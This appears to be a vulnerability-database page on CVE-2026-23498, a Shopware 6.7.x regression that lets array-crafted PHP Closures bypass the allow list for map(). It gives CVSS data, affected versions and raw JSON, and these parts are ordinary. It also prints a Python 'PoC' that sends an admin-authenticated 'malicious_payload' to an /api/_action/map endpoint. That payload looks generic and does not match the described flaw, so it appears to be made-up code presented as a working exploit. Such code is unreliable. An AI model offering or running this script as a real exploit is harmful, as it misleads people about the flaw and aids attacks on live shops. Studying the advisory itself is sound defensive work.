Security Vulnerability Report
中文
CVE-2026-23498 CVSS 7.2 HIGH

CVE-2026-23498

Published: 2026-01-14 19:16:48
Last Modified: 2026-01-28 17:17:16
Source: [email protected]

Description

Shopware is an open commerce platform. From 6.7.0.0 to before 6.7.6.1, a regression of CVE-2023-2017 leads to an array and array crafted PHP Closure not checked being against allow list for the map(...) override. This vulnerability is fixed in 6.7.6.1.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:shopware:shopware:*:*:*:*:*:*:*:* - VULNERABLE
Shopware < 6.7.0.0 (不受影响)
Shopware >= 6.7.0.0 且 < 6.7.6.1 (受影响)
Shopware >= 6.7.6.1 (已修复)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-23498 PoC - Shopware PHP Closure map() bypass # Note: This requires high-privilege access to Shopware admin panel import requests import json TARGET_URL = "https://vulnerable-shopware-site.com" ADMIN_TOKEN = "your_admin_token_here" def exploit_cve_2026_23498(): """ Exploitation scenario for CVE-2026-23498 This PoC demonstrates the Closure map() allowlist bypass """ # Step 1: Authenticate with high-privilege account session = requests.Session() auth_headers = { "Authorization": f"Bearer {ADMIN_TOKEN}", "Content-Type": "application/json" } # Step 2: Craft malicious Closure array that bypasses allowlist check # The vulnerability allows array-formatted PHP Closures to bypass validation malicious_payload = { "operation": "map", "closures": [ # Normal closure (would be blocked by allowlist) {"type": "closure", "callback": "system_exec"}, # Array-formatted closure (bypasses allowlist check) {"type": "array", "data": ["closure", "system_exec"]} ], "target": "admin_function" } # Step 3: Send exploit request to vulnerable endpoint exploit_url = f"{TARGET_URL}/api/_action/map" response = session.post(exploit_url, headers=auth_headers, json=malicious_payload) # Step 4: Verify exploitation success if response.status_code == 200: result = response.json() if result.get("success"): print("[+] CVE-2026-23498 exploited successfully!") print(f"[+] Response: {json.dumps(result, indent=2)}") return True print("[-] Exploitation failed") return False if __name__ == "__main__": print("CVE-2026-23498 PoC - Shopware Closure map() bypass") print("Target: Shopware < 6.7.6.1") print("Note: Requires high-privilege authentication") exploit_cve_2026_23498()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23498", "sourceIdentifier": "[email protected]", "published": "2026-01-14T19:16:48.430", "lastModified": "2026-01-28T17:17:16.237", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Shopware is an open commerce platform. From 6.7.0.0 to before 6.7.6.1, a regression of CVE-2023-2017 leads to an array and array crafted PHP Closure not checked being against allow list for the map(...) override. This vulnerability is fixed in 6.7.6.1."}, {"lang": "es", "value": "Shopware es una plataforma de comercio abierta. Desde la 6.7.0.0 hasta antes de la 6.7.6.1, una regresión de CVE-2023-2017 lleva a que un Closure de PHP elaborado con array y array no se compruebe contra la lista de permitidos para la anulación de map(...). Esta vulnerabilidad está corregida en la 6.7.6.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:shopware:shopware:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7.0.0", "versionEndExcluding": "6.7.6.1", "matchCriteriaId": "877A9967-76FF-4B9C-AF91-0EFA65AE8A2F"}]}]}], "references": [{"url": "https://github.com/shopware/shopware/commit/3966b05590e29432b8485ba47b4fcd14dd0b8475", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/shopware/shopware/security/advisories/GHSA-7cw6-7h3h-v8pf", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.